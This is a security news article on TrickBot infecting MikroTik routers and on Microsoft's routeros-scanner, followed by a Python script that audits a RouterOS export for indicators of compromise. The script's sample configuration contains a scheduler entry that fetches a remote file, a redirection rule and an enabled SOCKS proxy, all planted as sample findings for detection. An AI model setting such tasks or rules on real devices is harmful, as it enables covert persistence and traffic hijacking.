Various security threats can put our routers at risk and affect their proper functioning. One of the most dangerous in recent years is TrickBot. Microsoft has now created a tool that scans MikroTik routers to find out whether they are infected by this threat. MikroTik is one of the most widely used brands, so the tool is relevant to many users.
Detect if your router is affected by TrickBot
TrickBot is a security threat that has been very present in recent years. It is a botnet that is normally distributed by email using phishing tactics, or through other malware that has previously infected the victim. From then on, it connects to a server controlled by the attacker and allows that server to send malicious payloads to the infected computer.
This threat has affected a wide variety of IoT devices as well as routers. It makes the compromised device act as a proxy between the infected device and the attackers' server. In recent times, attackers have used TrickBot to compromise MikroTik routers.
To gain access, they relied mainly on default credentials. For this reason, it is important to always change the factory-default access credentials when you buy a router. Attackers can also perform brute-force attacks to gain control of devices, and they have exploited vulnerabilities such as CVE-2018-14847.
The problem is that there are hundreds of thousands of MikroTik routers that are still vulnerable. For this reason, Microsoft has released a tool called routeros-scanner, which administrators can use to analyze devices of this brand, find out whether they are infected with TrickBot, and take action as soon as possible.
In essence, the script determines the version of the device and whether it is vulnerable to a particular vulnerability, and checks for scheduled tasks, traffic redirection rules, DNS cache poisoning, changes to default ports, suspicious files, and proxies. This helps establish whether that specific device is at risk.
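To make those configuration checks concrete, here is an added example (not Microsoft's routeros-scanner code and not from the original article) that audits a saved RouterOS configuration export offline for scheduled tasks, redirection rules, static DNS entries, changed service ports and enabled proxies. The sample export, the function name audit_export and the category labels are constructed for illustration; multi-line (backslash-continued) export entries are not handled.

```python
import re

# Constructed RouterOS "/export"-style text for illustration (not from a real device).
SAMPLE_EXPORT = """\
/ip dns static
add address=203.0.113.10 name=update.example.test
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=8080 protocol=tcp to-addresses=203.0.113.20 to-ports=80
/ip service
set winbox port=18291
set ssh disabled=yes
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=10m name=task1 on-event="/tool fetch url=http://203.0.113.30/a"
"""

# RouterOS default management service ports, used as the baseline in this example.
DEFAULT_PORTS = {"winbox": 8291, "ssh": 22, "telnet": 23, "ftp": 21, "www": 80, "api": 8728}

def audit_export(text):
    """Return (category, line) findings that an administrator should review."""
    findings, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # a new menu section begins
            section = line
            continue
        if section == "/system scheduler" and line.startswith("add"):
            findings.append(("scheduled-task", line))
        elif section == "/ip firewall nat" and re.search(r"action=(dst-nat|redirect|netmap)\b", line):
            findings.append(("traffic-redirection", line))
        elif section == "/ip dns static" and line.startswith("add"):
            findings.append(("static-dns-entry", line))
        elif section in ("/ip socks", "/ip proxy") and "enabled=yes" in line:
            findings.append(("proxy-enabled", line))
        elif section == "/ip service":
            m = re.match(r"set (\S+) .*?\bport=(\d+)", line)
            if m and DEFAULT_PORTS.get(m.group(1)) not in (None, int(m.group(2))):
                findings.append(("non-default-port", line))
    return findings

if __name__ == "__main__":
    for category, line in audit_export(SAMPLE_EXPORT):
        print(f"[{category}] {line}")
```

A finding is a prompt for review, not proof of infection: legitimate port forwards, static DNS records and scheduled jobs will be listed too and should be compared against what the administrator configured.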